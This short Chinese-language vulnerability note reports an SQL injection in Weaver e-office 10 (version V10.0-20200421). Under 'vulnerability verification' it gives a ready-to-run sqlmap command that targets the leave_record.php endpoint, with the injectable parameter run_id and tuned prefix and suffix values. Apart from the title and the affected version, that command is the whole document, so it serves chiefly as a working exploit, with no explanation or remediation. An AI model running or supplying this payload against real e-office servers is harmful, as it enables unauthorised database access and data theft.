泛微eoffice10-20200421注入漏洞

漏洞存在的版本： V10.0-20200421 漏洞验证： 注入点位置： python sqlmap.py -u "http://127.0.0.1:8010/eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1&table_field=1&table_field_name=user()&max_rows=10" --prefix="') " --suffix="%23" -p run_id